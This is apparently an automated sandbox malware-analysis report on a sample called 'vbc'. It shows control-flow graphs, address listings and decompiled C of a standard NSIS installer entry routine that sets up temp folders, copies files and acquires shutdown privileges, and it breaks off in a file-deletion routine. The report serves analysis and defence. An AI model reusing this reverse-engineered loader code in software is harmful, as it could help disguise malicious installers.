API calls 4569->4571 4570->4545 4578 404c9b 4571->4578 4574 404c1b lstrcmpiW 4572->4574 4573 404cdc 4600 40666e lstrcpynW 4573->4600 4574->4568 4575 404c2c lstrcatW 4574->4575 4575->4568 4577 404ce3 4579 405fe8 4 API calls 4577->4579 4578->4573 4583 405f89 2 API calls 4578->4583 4584 404d34 4578->4584 4580 404ce9 GetDiskFreeSpaceW 4579->4580 4582 404d0d MulDiv 4580->4582 4580->4584 4582->4584 4583->4578 4585 404da5 4584->4585 4587 404f40 20 API calls 4584->4587 4586 404dc8 4585->4586 4588 40140b 2 API calls 4585->4588 4601 4045ec EnableWindow 4586->4601 4589 404d92 4587->4589 4588->4586 4591 404da7 SetDlgItemTextW 4589->4591 4592 404d97 4589->4592 4591->4585 4594 404e77 20 API calls 4592->4594 4593 404de4 4593->4546 4595 404a14 SendMessageW 4593->4595 4594->4585 4595->4546 4596->4541 4597->4567 4598->4552 4599->4569 4600->4577 4601->4593 4602 40263e 4603 402652 4602->4603 4604 40266d 4602->4604 4605 402d84 17 API calls 4603->4605 4606 402672 4604->4606 4607 40269d 4604->4607 4613 402659 4605->4613 4608 402da6 17 API calls 4606->4608 4609 402da6 17 API calls 4607->4609 4610 402679 4608->4610 4611 4026a4 lstrlenW 4609->4611 4619 406690 WideCharToMultiByte 4610->4619 4611->4613 4616 40623f 5 API calls 4613->4616 4617 4026e7 4613->4617 4618 4026d1 4613->4618 4614 40268d lstrlenA 4614->4613 4615 406210 WriteFile 4615->4617 4616->4618 4618->4615 4618->4617 4619->4614

                                          Executed Functions

                                          Function 00403646 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 450stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
                                          C-Code - Quality: 78%
                                          			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x7b3000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				E0040666E(0x7b3000, GetCommandLineW());
				_t94 = 0x7b3000;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				if( *0x7b3000 == _t233) {
					_t94 = 0x7b3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(0x7b3800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(0x7b3000, _t188);
											if(_t218 < 0x7b3000) {
												L48:
												_t263 = _t218 - 0x7b3000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x7b3000) {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x7b4800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x7b3800;
														if( *0x7b3800 == 0) {
															E0040666E(0x7b3800, 0x7b4800);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(0x7b3800, _t221);
												E0040666E(0x7b4000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x7b3000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                                          0x00403654
                                          0x00403655
                                          0x0040365c
                                          0x0040365f
                                          0x00403666
                                          0x00403669
                                          0x0040367c
                                          0x00403682
                                          0x00403685
                                          0x00403688
                                          0x00403696
                                          0x0040369e
                                          0x004036a9
                                          0x004036c2
                                          0x004036c4
                                          0x004036cc
                                          0x004036cc
                                          0x004036d7
                                          0x004036d9
                                          0x004036d9
                                          0x004036ee
                                          0x00403713
                                          0x00403721
                                          0x00403724
                                          0x0040372b
                                          0x00403732
                                          0x00403732
                                          0x0040372b
                                          0x00403734
                                          0x00403739
                                          0x0040373a
                                          0x00403746
                                          0x0040374a
                                          0x00403751
                                          0x0040375f
                                          0x00403764
                                          0x0040376b
                                          0x0040376f
                                          0x00403773
                                          0x00403775
                                          0x00403775
                                          0x00403773
                                          0x0040377c
                                          0x00403783
                                          0x00403789
                                          0x004037a1
                                          0x004037b1
                                          0x004037c3
                                          0x004037ca
                                          0x004037cc
                                          0x004037cd
                                          0x004037de
                                          0x004037e2
                                          0x004037e2
                                          0x004037f5
                                          0x004037f7
                                          0x004038f1
                                          0x004038f1
                                          0x004038f4
                                          0x004038f7
                                          0x00000000
                                          0x00000000
                                          0x00403801
                                          0x00403802
                                          0x00403805
                                          0x0040380e
                                          0x0040380e
                                          0x00403811
                                          0x00403814
                                          0x00403817
                                          0x0040381a
                                          0x0040381a
                                          0x0040381a
                                          0x0040381b
                                          0x0040381f
                                          0x004038df
                                          0x004038e8
                                          0x004038ea
                                          0x004038ed
                                          0x004038f0
                                          0x004038f0
                                          0x004038f0
                                          0x00000000
                                          0x00403825
                                          0x00403826
                                          0x00403827
                                          0x0040382b
                                          0x00403845
                                          0x0040384c
                                          0x0040385f
                                          0x00403860
                                          0x00403875
                                          0x0040387a
                                          0x0040387c
                                          0x0040387e
                                          0x0040389a
                                          0x004038a1
                                          0x004038b4
                                          0x004038b5
                                          0x004038ca
                                          0x004038d0
                                          0x004038d2
                                          0x004038d4
                                          0x004038dc
                                          0x004038de
                                          0x00000000
                                          0x004038de
                                          0x004038d8
                                          0x004038da
                                          0x004038ff
                                          0x00403903
                                          0x0040390c
                                          0x00403911
                                          0x00403917
                                          0x00403922
                                          0x00403924
                                          0x00403929
                                          0x0040392b
                                          0x00403983
                                          0x00403988
                                          0x00403991
                                          0x00403998
                                          0x0040399b
                                          0x00403b72
                                          0x00403b72
                                          0x00403b77
                                          0x00403b80
                                          0x00403b9d
                                          0x00403c15
                                          0x00403c15
                                          0x00403c1d
                                          0x00403c1f
                                          0x00403c1f
                                          0x00403c25
                                          0x00403c25
                                          0x00403bb4
                                          0x00403bc0
                                          0x00403bd1
                                          0x00403bd8
                                          0x00403bdf
                                          0x00403bdf
                                          0x00403be7
                                          0x00403bf3
                                          0x00403c01
                                          0x00403c0c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403bf5
                                          0x00403bf5
                                          0x00403bf6
                                          0x00403bf8
                                          0x00403bf9
                                          0x00403bfa
                                          0x00403bff
                                          0x00403c0e
                                          0x00403c10
                                          0x00000000
                                          0x00403c10
                                          0x00000000
                                          0x00403bff
                                          0x00403bf3
                                          0x00403b8a
                                          0x00403b91
                                          0x00403b91
                                          0x004039a7
                                          0x00403a4e
                                          0x00403a4e
                                          0x00403a5a
                                          0x00000000
                                          0x00403a5a
                                          0x004039b8
                                          0x004039c0
                                          0x00403a12
                                          0x00403a12
                                          0x00403a18
                                          0x00403a1f
                                          0x00403a6d
                                          0x00403a6f
                                          0x00403a74
                                          0x00403a76
                                          0x00403a7e
                                          0x00403a7e
                                          0x00403a89
                                          0x00403a95
                                          0x00403a9b
                                          0x00403a9d
                                          0x00403b70
                                          0x00403b70
                                          0x00403b70
                                          0x00000000
                                          0x00403aa3
                                          0x00403aa3
                                          0x00403aa5
                                          0x00403aa6
                                          0x00403aaf
                                          0x00403aa8
                                          0x00403aa8
                                          0x00403aa8
                                          0x00403ab5
                                          0x00403abd
                                          0x00403ac4
                                          0x00403acc
                                          0x00403acc
                                          0x00403ad9
                                          0x00403ae5
                                          0x00403aef
                                          0x00403aef
                                          0x00403af1
                                          0x00403af8
                                          0x00403b02
                                          0x00403b0e
                                          0x00403b14
                                          0x00403b1a
                                          0x00403b1d
                                          0x00403b27
                                          0x00403b2d
                                          0x00403b2f
                                          0x00403b33
                                          0x00403b44
                                          0x00403b4a
                                          0x00403b4f
                                          0x00403b51
                                          0x00403b54
                                          0x00403b5a
                                          0x00403b5a
                                          0x00403b51
                                          0x00403b2f
                                          0x00403b5d
                                          0x00403b64
                                          0x00403b64
                                          0x00403b64
                                          0x00403b64
                                          0x00403b6b
                                          0x00000000
                                          0x00403b6b
                                          0x00403a9d
                                          0x00403a21
                                          0x00403a24
                                          0x00403a28
                                          0x00403a2d
                                          0x00403a2f
                                          0x00000000
                                          0x00000000
                                          0x00403a3b
                                          0x00403a46
                                          0x00403a4b
                                          0x00000000
                                          0x00403a4b
                                          0x004039c9
                                          0x004039e1
                                          0x004039f2
                                          0x004039f3
                                          0x004039f7
                                          0x004039f9
                                          0x00403a07
                                          0x00403a0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403a0e
                                          0x00403a10
                                          0x00000000
                                          0x00403a10
                                          0x00403933
                                          0x0040393f
                                          0x00403944
                                          0x00403949
                                          0x0040394b
                                          0x00000000
                                          0x00000000
                                          0x00403953
                                          0x0040395b
                                          0x0040396c
                                          0x00403974
                                          0x00403976
                                          0x0040397b
                                          0x0040397d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040397d
                                          0x00000000
                                          0x004038da
                                          0x00403883
                                          0x00403885
                                          0x00000000
                                          0x00000000
                                          0x00403887
                                          0x0040388b
                                          0x0040388f
                                          0x00403896
                                          0x00403896
                                          0x00403896
                                          0x00403896
                                          0x00000000
                                          0x00403896
                                          0x00403891
                                          0x00403894
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403894
                                          0x0040382d
                                          0x00403831
                                          0x00403834
                                          0x0040383b
                                          0x0040383b
                                          0x00000000
                                          0x0040383b
                                          0x00403836
                                          0x00403839
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403839
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403807
                                          0x00403807
                                          0x00403808
                                          0x00403809
                                          0x00403809
                                          0x00000000
                                          0x00403807
                                          0x00000000

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                                          • GetVersionExW.KERNEL32(?), ref: 00403692
                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                                          • OleInitialize.OLE32(00000000), ref: 00403783
                                          • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                                          • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                                          • CharNextW.USER32(00000000), ref: 004037EF
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                                          • lstrcatW.KERNEL32 ref: 0040393F
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
                                          • lstrcatW.KERNEL32 ref: 0040395B
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                                          • DeleteFileW.KERNELBASE(1033), ref: 00403988
                                          • lstrcatW.KERNEL32 ref: 00403A6F
                                          • lstrcatW.KERNEL32 ref: 00403A7E
                                            • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                          • lstrcatW.KERNEL32 ref: 00403A89
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                                          • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                                          • CopyFileW.KERNEL32 ref: 00403B27
                                          • CloseHandle.KERNEL32(00000000), ref: 00403B54
                                          • ExitProcess.KERNELBASE(?), ref: 00403B72
                                          • OleUninitialize.OLE32 ref: 00403B77
                                          • ExitProcess.KERNEL32 ref: 00403B91
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                                          • ExitProcess.KERNEL32 ref: 00403C25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                          • API String ID: 2292928366-4036104658
                                          • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                          • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                                          • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                          • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 391 405d7a-405da0 call 406045 394 405da2-405db4 DeleteFileW 391->394 395 405db9-405dc0 391->395 396 405f36-405f3a 394->396 397 405dc2-405dc4 395->397 398 405dd3-405de3 call 40666e 395->398 400 405ee4-405ee9 397->400 401 405dca-405dcd 397->401 404 405df2-405df3 call 405f89 398->404 405 405de5-405df0 lstrcatW 398->405 400->396 403 405eeb-405eee 400->403 401->398 401->400 406 405ef0-405ef6 403->406 407 405ef8-405f00 call 4069a4 403->407 408 405df8-405dfc 404->408 405->408 406->396 407->396 415 405f02-405f16 call 405f3d call 405d32 407->415 411 405e08-405e0e lstrcatW 408->411 412 405dfe-405e06 408->412 414 405e13-405e2f lstrlenW FindFirstFileW 411->414 412->411 412->414 416 405e35-405e3d 414->416 417 405ed9-405edd 414->417 433 405f18-405f1b 415->433 434 405f2e-405f31 call 4056d0 415->434 420 405e5d-405e71 call 40666e 416->420 421 405e3f-405e47 416->421 417->400 419 405edf 417->419 419->400 431 405e73-405e7b 420->431 432 405e88-405e93 call 405d32 420->432 423 405e49-405e51 421->423 424 405ebc-405ecc FindNextFileW 421->424 423->420 428 405e53-405e5b 423->428 424->416 427 405ed2-405ed3 FindClose 424->427 427->417 428->420 428->424 431->424 436 405e7d-405e86 call 405d7a 431->436 444 405eb4-405eb7 call 4056d0 432->444 445 405e95-405e98 432->445 433->406 435 405f1d-405f2c call 4056d0 call 40642e 433->435 434->396 435->396 436->424 444->424 447 405e9a-405eaa call 4056d0 call 40642e 445->447 448 405eac-405eb2 445->448 447->424 448->424
                                          C-Code - Quality: 98%
                                          			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
